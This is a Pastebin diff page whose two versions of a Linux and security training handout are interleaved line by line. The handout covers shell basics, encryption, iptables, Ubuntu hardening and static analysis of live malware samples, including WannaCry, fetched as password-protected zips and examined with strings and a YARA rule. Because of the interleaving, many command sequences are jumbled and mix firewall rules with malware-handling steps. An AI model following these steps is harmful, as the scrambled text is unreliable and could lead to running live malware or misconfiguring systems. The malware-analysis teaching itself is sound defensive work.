View difference between Paste ID: <a href="/eduSfPy3">eduSfPy3</a> and <a href="/eVD9Cmjg">eVD9Cmjg</a> - Pastebin.com

View difference between Paste ID: eduSfPy3 and eVD9Cmjg

SHOW: | | - or go back to the newest paste.

#####################################
###############################################################
# InfoSecAddicts Intro to Linux     # 
# InfoSecAddicts Intro to Linux & Comptia Linux+ Exam Prep    # 
# By Joe McCray                     #
# By Joe McCray                                               #
#####################################
###############################################################



##########
# VMWare #
##########
- For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.

- http://www.vmware.com/ap/products/player.html


- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.


##########################
# Download the attack VM #
##########################
https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip
user:      infosecaddicts
pass:      infosecaddicts

- Here is a good set of slides for getting started with Linux:
http://www.slideshare.net/olafusimichael/linux-training-24086319


- Here is a good tutorial that you should complete before doing the labs below:
http://linuxsurvival.com/linux-tutorial-introduction/


- Log in to your Ubuntu host with the following credentials:
	user:      infosecaddicts
	pass:      infosecaddicts



- I prefer to use Putty to SSH into my Ubuntu host on pentests and I'll be teaching this class in the same manner that I do pentests.
- You can download Putty from here:
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe


- For the purpose of this workshop 192.168.230.128 is my Ubuntu IP address so anytime you see that IP you'll know that's my Ubuntu host



########################
# Basic Linux Commands #
########################

---------------------------Type This-----------------------------------
cd ~

pwd

whereis pwd

which pwd

sudo find / -name pwd

/bin/pwd

mkdir LinuxBasics

cd LinuxBasics

touch one two three

ls -l t		(without pressing the Enter key, press the Tab key twice. What happens?)

h		(and again without pressing the Enter key, press the Tab key twice. What happens?)

Press the 'Up arrow key'	(What happens?)

Press 'Ctrl-A'			(What happens?)

ls

clear				(What happens?)

echo one > one

cat one				(What happens?)

man cat				(What happens?)
	q

cat two

cat one > two

cat two

cat one two > three

cat three

echo four >> three

cat three 			(What happens?)

wc -l three

man wc
	q

info wc
	q

cat three | grep four

cat three | grep one

man grep
	q


man ps
	q

ps

ps aux

ps aux | less

Press the 'Up arrow key'	(What happens?)

Press the 'Down arrow key'	(What happens?)
	q

top
    q
-----------------------------------------------------------------------


#########
# Files #
#########
---------------------------Type This-----------------------------------
cd ~

pwd

ls

cd LinuxBasics

pwd

cd ~

pwd

cd LinuxBasics

ls

mkdir files

cp one files/

ls files/

cd files/

cp ../two .

ls

cp ../three .

ls

tar cvf files.tar *

ls

gzip files.tar

ls

rm -rf one two three

ls

tar -zxvf files.tar.gz

rm -rf files.tar.gz

sudo apt install -y zip unzip

zip data *

unzip -l data.zip

unzip data.zip -d /tmp
-----------------------------------------------------------------------



############
# VIM Demo #
############
---------------------------Type This-----------------------------------
cd ~
sudo apt install -y vim
     infosecaddicts

cd LinuxBasics

mkdir vimlesson

cd vimlesson

vi lesson1.sh

i			(press "i" to get into INSERT mode and then paste in the lines below)

#!/bin/bash

echo "This is my first time using vi to create a shell script"
echo " "
echo " "
echo " "
sleep 5
echo "Ok, now let's clear the screen"
sleep 3
clear


---------------don't put this line in your script----------------------------

ESC			(press the ESC key to get you out of INSERT mode)

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.


wq			(typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).



vi lesson1.sh

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

set number 	(typing "set number" immediately after SHIFT: will add line numbers to vim).

wq			(typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).




vi lesson1.sh

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

set number 	(typing "set number" immediately after SHIFT: will add line numbers to vim).


[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

/echo		(typing "/echo" immediately after SHIFT: will search the file for the word echo).

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

wq			(typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).




vi lesson1.sh

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

set number 	(typing "set number" immediately after SHIFT: will add line numbers to vim).


[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

4		(typing "4" immediately after SHIFT: will take you to line number 4).

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

wq			(typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).




vi lesson1.sh

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

set number 	(typing "set number" immediately after SHIFT: will add line numbers to vim).


[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

4		(typing "4" immediately after SHIFT: will take you to line number 4).

dd		(typing "dd" will delete the line that you are on)

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

wq			(typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).




vi lesson1.sh

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

set number 	(typing "set number" immediately after SHIFT: will add line numbers to vim).


[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

4		(typing "4" immediately after SHIFT: will take you to line number 4).

dd		(typing "dd" will delete the line that you are on)

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

syntax on		(typing "syntax on" immediately after SHIFT: will turn on syntax highlighting

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

set tabstop=5	(typing "set tabstop=5" immediately after SHIFT: will set your tabs to 5 spaces

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

wq			(typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).




vi .vimrc
i			(press "i" to get into INSERT mode and then paste in the lines below)


set number
syntax on
set tabstop=5

ESC			(press the ESC key to get you out of INSERT mode)

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

wq			(typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).






vi lesson1.sh

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

echo $MYVIMRC	(typing "echo $MYVIMRC" immediately after SHIFT: will display the path to your new .vimrc file

[SHIFT+:]	(press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.

wq			(typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
-----------------------------------------------------------------------

###############
# Permissions #
###############
---------------------------Type This-----------------------------------
cd ~ 

pwd

ls

cd LinuxBasics

ls -l one
-----------------------------------------------------------------------
We can determine a lot from examining the results of this command. The file "one" is owned by user "me". 
Now "me" has the right to read and write this file. 
The file is owned by the group "me". Members of the group "me" can also read and write this file. 
Everybody else can read this file


---------------------------Type This-----------------------------------
ls -l /bin/bash
-----------------------------------------------------------------------

Here we can see:

The file "/bin/bash" is owned by user "root". The superuser has the right to read, write, and execute this file. 
The file is owned by the group "root". Members of the group "root" can also read and execute this file.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Everybody else can read and execute this file


The next command you need to know is "chmod"
rwx rwx rwx = 111 111 111
rw- rw- rw- = 110 110 110
rwx --- --- = 111 000 000

and so on...

rwx = 111 in binary = 7
rw- = 110 in binary = 6
r-x = 101 in binary = 5
r-- = 100 in binary = 4


---------------------------Type This-----------------------------------
ls -l one

chmod 600 one

ls -l one

sudo useradd testuser
     infosecaddicts

sudo passwd testuser

testuser
testuser

sudo chown testuser one
     infosecaddicts

ls -l one

sudo chgrp testuser one
     infosecaddicts

ls -l one

id

su testuser
testuser
-----------------------------------------------------------------------

Here is a table of numbers that covers all the common settings. The ones beginning with "7" are used with programs (since they enable execution) and the rest are for other kinds of files.

Value	Meaning
777 (rwxrwxrwx) No restrictions on permissions. Anybody may do anything. Generally not a desirable setting.

755 (rwxr-xr-x) The file's owner may read, write, and execute the file. All others may read and execute the file. This setting is common for programs that are used by all users.

700 (rwx------) The file's owner may read, write, and execute the file. Nobody else has any rights. This setting is useful for programs that only the owner may use and must be kept private from others.

666 (rw-rw-rw-) All users may read and write the file.

644 (rw-r--r--) The owner may read and write a file, while all others may only read the file. A common setting for data files that everybody may read, but only the owner may change.

600 (rw-------) The owner may read and write a file. All others have no rights. A common setting for data files that the owner wants to keep private.



Directory permissions
---------------------
The chmod command can also be used to control the access permissions for directories. In most ways, the permissions scheme for directories works the same way as they do with files. However, the execution permission is used in a different way. It provides control for access to file listing and other things. Here are some useful settings for directories:

Value	Meaning
777 (rwxrwxrwx) No restrictions on permissions. 
Anybody may list files, create new files in the directory and delete files in the directory. 
Generally not a good setting.



755 (rwxr-xr-x) The directory owner has full access. 
All others may list the directory, but cannot create files nor delete them. 
This setting is common for directories that you wish to share with other users.



700 (rwx------) The directory owner has full access. Nobody else has any rights. This setting is useful for directories that only the owner may use and must be kept private from others.

######################
# Process Management #
######################
---------------------------Type This-----------------------------------
top

sudo apt install -y htop
     infosecaddicts

htop

ps

ps aux

ps -A

ps -A | less

ps axjf

pstree

pstree -A

pgrep bash

pgrep init

ps aux | grep apache
-----------------------------------------------------------------------



You can list all of the signals that are possible to send with kill by typing:
---------------------------Type This-----------------------------------
kill -l

sudo kill -HUP pid_of_apache

The pkill command works in almost exactly the same way as kill, but it operates on a process name instead:

pkill -9 ping
The above command is the equivalent of:

kill -9 `pgrep ping`
-----------------------------------------------------------------------




####################
# MD5 Hashing Demo #
####################
---------------------------Type This-----------------------------------
cd ~/LinuxBasics
mkdir hashdemo
cd hashdemo
echo test > test.txt
cat test.txt
md5sum test.txt
echo hello >> test.txt
cat test.txt
md5sum test.txt
cd ..
-----------------------------------------------------------------------



#################################
# Symmetric Key Encryption Demo #
#################################
---------------------------Type This-----------------------------------
cd ~/LinuxBasics
mkdir gpgdemo
cd gpgdemo
echo test > test.txt
cat test.txt
/etc/init.d/rng-tools start

	password
	password
ls | grep test
cat test.txt
cat test.txt.gpg
rm -rf test.txt
ls | grep test
gpg -o output.txt test.txt.gpg
	password
cat output.txt
-----------------------------------------------------------------------



#########################################################################################################################
# Asymmetric Key Encryption Demo 											                                            #
#															                                                            #
# Configure random number generator 											                                        #
# https://www.howtoforge.com/helping-the-random-number-generator-to-gain-enough-entropy-with-rng-tools-debian-lenny	    #
#########################################################################################################################
---------------------------Type This-----------------------------------
sudo apt install -y rng-tools
     infosecaddicts

sudo /etc/init.d/rng-tools start

sudo rngd -r /dev/urandom
     infosecaddicts


echo hello > file1.txt
echo goodbye > file2.txt
echo green > file3.txt
echo blue > file4.txt

tar czf files.tar.gz *.txt

gpg --gen-key
	1
	1024
	0
	y
	John Doe
	john@doe.com
	--blank comment--
	O
		password
		password	



gpg --armor --output file-enc-pubkey.txt --export 'John Doe'

cat file-enc-pubkey.txt

gpg --armor --output file-enc-privkey.asc --export-secret-keys 'John Doe'

cat file-enc-privkey.asc

gpg --encrypt --recipient 'John Doe' files.tar.gz

rm -rf files.tar.gz *.txt

ls

tar -zxvf files.tar.gz.gpg

gpg --output output.tar.gz --decrypt files.tar.gz.gpg
	password

tar -zxvf output.tar.gz

ls
-----------------------------------------------------------------------




sudo apt install -y secure-delete wipe

# Encryption using OpenSSL #
############################
---------------------------Type This-----------------------------------
openssl genrsa -out private_key.pem 1024

openssl rsa -in private_key.pem -out public_key.pem -outform PEM -pubout


echo hello > encrypt.txt
openssl rsautl -encrypt -inkey public_key.pem -pubin -in encrypt.txt -out encrypt.dat

cat encrypt.dat

wipe tcpip.pdf


ls

openssl rsautl -decrypt -inkey private_key.pem -in encrypt.dat -out decrypt.txt

cat decrypt.txt
# IPTables Demo #
-----------------------------------------------------------------------


###############################
- Delete Existing Rules

###############################
sudo /sbin/iptables -F
---------------------------Type This-----------------------------------
sudo apt install -y secure-delete

	(or)


sudo /sbin/iptables --flush


sudo srm tcpip.pdf

wget https://www.sans.org/security-resources/tcpip.pdf
- Set Default Chain Policies

shred tcpip.pdf
iptables -P INPUT DROP

iptables -P FORWARD DROP

iptables -P OUTPUT DROP
-----------------------------------------------------------------------



- Delete Existing Rules


sudo /sbin/iptables -F



	(or)

# Log Analysis with Linux command-line tools #
sudo /sbin/iptables --flush

- The following command line executables are found in the Mac as well as most Linux Distributions.
 
cat –  prints the content of a file in the terminal window
grep – searches and filters based on patterns
awk –  can sort each row into fields and display only what is needed
sudo /bin/bash

sort – arranges output in an order
uniq – compares adjacent lines and can report, filter or provide a count of duplicates
 
- Block a Specific ip-address

-----------------------------

BLOCK_THIS_IP="1.2.3.4"

iptables -A INPUT -s "$BLOCK_THIS_IP" -j DROP

##############
# Cisco Logs #
iptables -A INPUT -i eth0 -s "$BLOCK_THIS_IP" -j DROP

iptables -A INPUT -i eth0 -p tcp -s "$BLOCK_THIS_IP" -j DROP
---------------------------Type This----------------------------------- 
wget https://s3.amazonaws.com/infosecaddictsfiles/cisco.log
-----------------------------------------------------------------------
- Allow ALL Incoming SSH


iptables -A INPUT -i eth0 -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A OUTPUT -o eth0 -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

- To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
---------------------------Type This----------------------------------- 
- Allow Incoming SSH only from a Sepcific Network

-------------------------------------------------
----------------------------------------------------------------------- 
iptables -A INPUT -i eth0 -p tcp -s 192.168.100.0/24 --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A OUTPUT -o eth0 -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

 
- Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
- Allow Incoming HTTP and HTTPS
---------------------------Type This----------------------------------- 
cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
iptables -A INPUT -i eth0 -p tcp --dport 80 -m state --state NEW,ESTABLISHED -j ACCEPT
----------------------------------------------------------------------- 
iptables -A OUTPUT -o eth0 -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT

 
 
iptables -A INPUT -i eth0 -p tcp --dport 443 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A OUTPUT -o eth0 -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT
---------------------------Type This----------------------------------- 
cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
----------------------------------------------------------------------- 
 
- Combine Multiple Rules Together using MultiPorts

--------------------------------------------------

iptables -A INPUT -i eth0 -p tcp -m multiport --dports 22,80,443 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A OUTPUT -o eth0 -p tcp -m multiport --sports 22,80,443 -m state --state ESTABLISHED -j ACCEPT                                                                                                                                                                                 

---------------------------Type This----------------------------------- 
cat cisco.log | grep %LINEPROTO-5-UPDOWN:
- Allow Outgoing SSH

--------------------

iptables -A OUTPUT -o eth0 -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A INPUT -i eth0 -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

 
cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
- Allow Outgoing SSH only to a Specific Network
-----------------------------------------------------------------------
-----------------------------------------------

The following rules allow outgoing ssh connection only to a specific network. i.e You an ssh only to 192.168.100.0/24 network from the inside.

################
iptables -A OUTPUT -o eth0 -p tcp -d 192.168.100.0/24 --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
# The Scenario #
iptables -A INPUT -i eth0 -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT
################
You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).


- Allow Outgoing HTTPS
The fastest thing you can do is perform static analysis. 
----------------------

The following rules allow outgoing secure web traffic. This is helpful when you want to allow internet traffic for your users. On servers, these rules are also helpful when you want to use wget to download some files from outside.


iptables -A OUTPUT -o eth0 -p tcp --dport 443 -m state --state NEW,ESTABLISHED -j ACCEPT
###################
iptables -A INPUT -i eth0 -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT
# Static Analysis #
###################

- After logging please open a terminal window and type the following commands:
---------------------------Type This-----------------------------------
Load Balance Incoming Web Traffic
cd Desktop/
-----------------------------------------------------------------------
You can also load balance your incoming web traffic using iptables firewall rules.

- This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
This uses the iptables nth extension. The following example load balances the HTTPS traffic to three different ip-address. For every 3th packet, it is load balanced to the appropriate server (using the counter 0).

---------------------------Type This-----------------------------------
iptables -A PREROUTING -i eth0 -p tcp --dport 443 -m state --state NEW -m nth --counter 0 --every 3 --packet 0 -j DNAT --to-destination 192.168.1.101:443
cd ~/Desktop/
iptables -A PREROUTING -i eth0 -p tcp --dport 443 -m state --state NEW -m nth --counter 0 --every 3 --packet 1 -j DNAT --to-destination 192.168.1.102:443
wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip --no-check-certificate
iptables -A PREROUTING -i eth0 -p tcp --dport 443 -m state --state NEW -m nth --counter 0 --every 3 --packet 2 -j DNAT --to-destination 192.168.1.103:443
wget https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py --no-check-certificate
 
unzip malware-password-is-infected.zip
    infected
Allow Ping from Outside to Inside

file malware.exe
The following rules allow outside users to be able to ping your servers.

mv malware.exe malware.pdf
iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT

iptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT
file malware.pdf
 
mv malware.pdf malware.exe
 
Allow Ping from Inside to Outside
hexdump -n 2 -C malware.exe
-----------------------------------------------------------------------
The following rules allow you to ping from inside to any of the outside servers.

 
iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT
***What is '4d 5a' or 'MZ'***
iptables -A INPUT -p icmp --icmp-type echo-reply -j ACCEPT

http://www.garykessler.net/library/file_sigs.html
 
---------------------------Type This-----------------------------------
Allow Loopback Access
objdump -x malware.exe
 
You should allow full loopback access on your servers. i.e access using 127.0.0.1
strings malware.exe
 
iptables -A INPUT -i lo -j ACCEPT
strings --all malware.exe | head -n 6
iptables -A OUTPUT -o lo -j ACCEPT

strings malware.exe | grep -i dll
 
strings malware.exe | grep -i library
Allow Internal Network to External network

strings malware.exe | grep -i reg
On the firewall server where one ethernet card is connected to the external, and another ethernet card connected to the internal servers, use the following rules to allow internal network talk to external network.

strings malware.exe | grep -i hkey
In this example, eth1 is connected to external network (internet), and eth0 is connected to internal network (For example: 192.168.1.x).

strings malware.exe | grep -i hku
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
-----------------------------------------------------------------------
                            - We didn't see anything like HKLM, HKCU or other registry type stuff
 
 
Allow outbound DNS
---------------------------Type This-----------------------------------
------------------
strings malware.exe | grep -i irc
The following rules allow outgoing DNS connections.

strings malware.exe | grep -i join         
iptables -A OUTPUT -p udp -o eth0 --dport 53 -j ACCEPT

iptables -A INPUT -p udp -i eth0 --sport 53 -j ACCEPT
strings malware.exe | grep -i admin
 
strings malware.exe | grep -i list
-----------------------------------------------------------------------
Allow Rsync From a Specific Network

                            - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
The following rules allows rsync only from a specific network.

---------------------------Type This-----------------------------------
iptables -A INPUT -i eth0 -p tcp -s 192.168.101.0/24 --dport 873 -m state --state NEW,ESTABLISHED -j ACCEPT
sudo apt-get install -y python-pefile
iptables -A OUTPUT -o eth0 -p tcp --sport 873 -m state --state ESTABLISHED -j ACCEPT
     malware
 
vi analyse_malware.py
 
Allow MySQL connection only from a specific network
python analyse_malware.py malware.exe
---------------------------------------------------
-----------------------------------------------------------------------
If you are running MySQL, typically you don’t want to allow direct connection from outside. In most cases, you might have web server running on the same server where the MySQL database runs.

 
However DBA and developers might need to login directly to the MySQL from their laptop and desktop using MySQL client. In those case, you might want to allow your internal network to talk to the MySQL directly as shown below.

 
iptables -A INPUT -i eth0 -p tcp -s 192.168.100.0/24 --dport 3306 -m state --state NEW,ESTABLISHED -j ACCEPT
################################
iptables -A OUTPUT -o eth0 -p tcp --sport 3306 -m state --state ESTABLISHED -j ACCEPT
# Good references for WannaCry #
################################
 
References:
Allow Sendmail or Postfix Traffic

https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168
The following rules allow mail traffic. It may be sendmail or postfix.
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
iptables -A INPUT -i eth0 -p tcp --dport 25 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A OUTPUT -o eth0 -p tcp --sport 25 -m state --state ESTABLISHED -j ACCEPT

 
- After logging please open a terminal window and type the following commands:
Allow IMAP and IMAPS
---------------------------Type This-----------------------------------
--------------------
cd Desktop/
The following rules allow IMAP/IMAP2 traffic.

wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
iptables -A INPUT -i eth0 -p tcp --dport 143 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A OUTPUT -o eth0 -p tcp --sport 143 -m state --state ESTABLISHED -j ACCEPT
unzip wannacry.zip
     infected
 
The following rules allow IMAPS traffic.
file wannacry.exe
 
iptables -A INPUT -i eth0 -p tcp --dport 993 -m state --state NEW,ESTABLISHED -j ACCEPT
mv wannacry.exe malware.pdf
iptables -A OUTPUT -o eth0 -p tcp --sport 993 -m state --state ESTABLISHED -j ACCEPT

file malware.pdf
 
mv malware.pdf wannacry.exe
 
Allow POP3 and POP3S
hexdump -n 2 -C wannacry.exe
--------------------
-----------------------------------------------------------------------
The following rules allow POP3 access.

 
iptables -A INPUT -i eth0 -p tcp --dport 110 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A OUTPUT -o eth0 -p tcp --sport 110 -m state --state ESTABLISHED -j ACCEPT
***What is '4d 5a' or 'MZ'***
The following rules allow POP3S access.

http://www.garykessler.net/library/file_sigs.html
iptables -A INPUT -i eth0 -p tcp --dport 995 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A OUTPUT -o eth0 -p tcp --sport 995 -m state --state ESTABLISHED -j ACCEPT

 
 
---------------------------Type This-----------------------------------
Port Forwarding
objdump -x wannacry.exe
---------------

The following example routes all traffic that comes to the port 442 to 22. This means that the incoming ssh connection can come from both port 22 and 422.
strings wannacry.exe
 
iptables -t nat -A PREROUTING -p tcp -d 192.168.102.37 --dport 422 -j DNAT --to 192.168.102.37:22
strings --all wannacry.exe | head -n 6
 
If you do the above, you also need to explicitly allow incoming connection on the port 422.
strings wannacry.exe | grep -i dll
 
iptables -A INPUT -i eth0 -p tcp --dport 422 -m state --state NEW,ESTABLISHED -j ACCEPT
strings wannacry.exe | grep -i library
iptables -A OUTPUT -o eth0 -p tcp --sport 422 -m state --state ESTABLISHED -j ACCEPT

strings wannacry.exe | grep -i reg
 
Log Dropped Packets
strings wannacry.exe | grep -i key
-------------------

You might also want to log all the dropped packets. These rules should be at the bottom.
strings wannacry.exe | grep -i rsa
 
First, create a new chain called LOGGING.
strings wannacry.exe | grep -i open
 
iptables -N LOGGING
strings wannacry.exe | grep -i get
Next, make sure all the remaining incoming connections jump to the LOGGING chain as shown below.

strings wannacry.exe | grep -i mutex
iptables -A INPUT -j LOGGING

Next, log these packets by specifying a custom “log-prefix”.
strings wannacry.exe | grep -i irc
 
iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables Packet Dropped: " --log-level 7
strings wannacry.exe | grep -i join        
Finally, drop these packets.

strings wannacry.exe | grep -i admin
iptables -A LOGGING -j DROP

strings wannacry.exe | grep -i list
-----------------------------------------------------------------------
 
#########################

# Ubuntu Perfect Server #

#########################

 
 
https://www.howtoforge.com/tutorial/ubuntu-perfect-server-with-apache-php-myqsl-pureftpd-bind-postfix-doveot-and-ispconfig/

 
 
deb http://de.archive.ubuntu.com/ubuntu/ yakkety main restricted

deb http://de.archive.ubuntu.com/ubuntu/ yakkety-updates main restricted
Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
deb http://de.archive.ubuntu.com/ubuntu/ yakkety universe

deb http://de.archive.ubuntu.com/ubuntu/ yakkety-updates universe
Quick Google search for "wannacry ransomeware analysis"
deb http://de.archive.ubuntu.com/ubuntu/ yakkety-updates multiverse

 
Reference
Then run
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
apt-get update

- Yara Rule -
to update the apt package database and

apt-get upgrade

Strings:
to install the latest updates (if there are any). If you see that a new kernel gets installed as part of the updates, you should reboot the system afterwards:
$s1 = “Ooops, your files have been encrypted!” wide ascii nocase
reboot
$s2 = “Wanna Decryptor” wide ascii nocase
$s3 = “.wcry” wide ascii nocase
Change the Default Shell
$s4 = “WANNACRY” wide ascii nocase
/bin/sh is a symlink to /bin/dash, however we need /bin/bash, not /bin/dash. Therefore, we do this:
$s5 = “WANACRY!” wide ascii nocase
dpkg-reconfigure dash
$s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
 
Use dash as the default system shell (/bin/sh)? <-- No

 
Disable AppArmor

----------------                                                      

AppArmor is a security extension (similar to SELinux) that should provide extended security. In my opinion, you don't need it to configure a secure system, and it usually causes more problems than advantages (think of it after you have done a week of trouble-shooting because some service wasn't working as expected, and then you find out that everything was ok, only AppArmor was causing the problem). Therefore, I disable it (this is a must if you want to install ISPConfig later on).

We can disable it like this:

 
service apparmor stop
Ok, let's look for the individual strings
update-rc.d -f apparmor remove 

apt-get remove apparmor apparmor-utils

---------------------------Type This-----------------------------------
strings wannacry.exe | grep -i ooops
apt-get -y install ntp ntpdate

strings wannacry.exe | grep -i wanna
Install Postfix, Dovecot, MariaDB, rkhunter and binutils

--------------------------------------------------------
strings wannacry.exe | grep -i wcry
For installing postfix, we need to ensure that sendmail is not installed and running. To stop and remove sendmail run this command:

strings wannacry.exe | grep -i wannacry
service sendmail stop; update-rc.d -f sendmail remove

strings wannacry.exe | grep -i wanacry          **** Matches $s5, hmmm.....
 -----------------------------------------------------------------------
 
 
#######################

# Hardening Ubuntu 16 #

#######################

 
This guide is intended as a relatively easy step by step guide to:
####################################
# Tired of GREP - let's try Python #
Harden the security on an Ubuntu 16.04 LTS server by installing and configuring the following:
####################################
Decided to make my own script for this kind of stuff in the future. I
Install and configure Firewall - ufw

Secure shared memory - fstab 
Reference1:
SSH - Key based login, disable root login and change port 
https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
Apache SSL - Disable SSL v3 support

Protect su by limiting access only to admin group 
This is a really good script for the basics of static analysis
Harden network with sysctl settings 

Disable Open DNS Recursion and Remove Version Info  - Bind9 DNS 

Prevent IP Spoofing
https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
Harden PHP for security 

Restrict Apache Information Leakage

Install and configure Apache application firewall - ModSecurity
This is really good for showing some good signatures to add to the Python script
Protect from DDOS (Denial of Service) attacks with ModEvasive

Scan logs and ban suspicious hosts - DenyHosts and Fail2Ban

Intrusion Detection - PSAD
Here is my own script using the signatures (started this yesterday, but still needs work):
Check for RootKits - RKHunter and CHKRootKit
https://pastebin.com/guxzCBmP
Scan open Ports - Nmap

Analyse system LOG files - LogWatch

Apparmor -  Application Armor

Audit your system security - Tiger and Tripwire
---------------------------Type This-----------------------------------
Requirements:
sudo apt install -y python-pefile
     infosecaddicts
Ubuntu 16.04 LTS or later server with a standard LAMP stack installed.

1. Firewall - UFW

 
A good place to start is to install a Firewall. 
wget https://pastebin.com/raw/guxzCBmP
UFW - Uncomplicated Firewall is a basic firewall that works very well and easy to configure with its Firewall configuration tool - gufw, or use  Shorewall, fwbuilder, or Firestarter.

Use Firestarter GUI to configure your firewall or refer to the Ubuntu Server Guide,  UFW manual pages or the Ubuntu UFW community documentation.

Install UFW and enable, open a terminal window and enter :
mv guxzCBmP am.py
sudo apt-get install ufw

Allow SSH and Http services.

sudo ufw allow ssh
vi am.py
sudo ufw allow http

Enable the firewall.
python am.py wannacry.exe
sudo ufw enable
-----------------------------------------------------------------------
Check the status of the firewall.

sudo ufw status verbose

2. Secure shared memory.

 
Shared memory can be used in an attack against a running service. Modify /etc/fstab to make it more secure.

Open a Terminal Window and enter the following :

sudo vi /etc/fstab

Add the following line and save. You will need to reboot for this setting to take effect :
Building a Malware Scanner
Note : This only is works in Ubuntu 12.10 or later - For earlier Ubuntu versions replace /run/shm with /dev/shm 

Save and Reboot when done

tmpfs     /run/shm     tmpfs     defaults,noexec,nosuid     0     0
---------------------------Type This-----------------------------------
3. SSH Hardening - key based login, disable root login and change port.
mkdir ~/Desktop/malwarescanner
 
The best way to secure SSH is to use public/private key based login. See SSH/OpenSSH/Keys
cd ~/Desktop/malwarescanner
If you have to use password authentication, the easiest way to secure SSH is to disable root login and change the SSH port to something different than the standard port 22. 

Before disabling the root login create a new SSH user and make sure the user belongs to the admin group (see step 4. below regarding the admin group).
wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
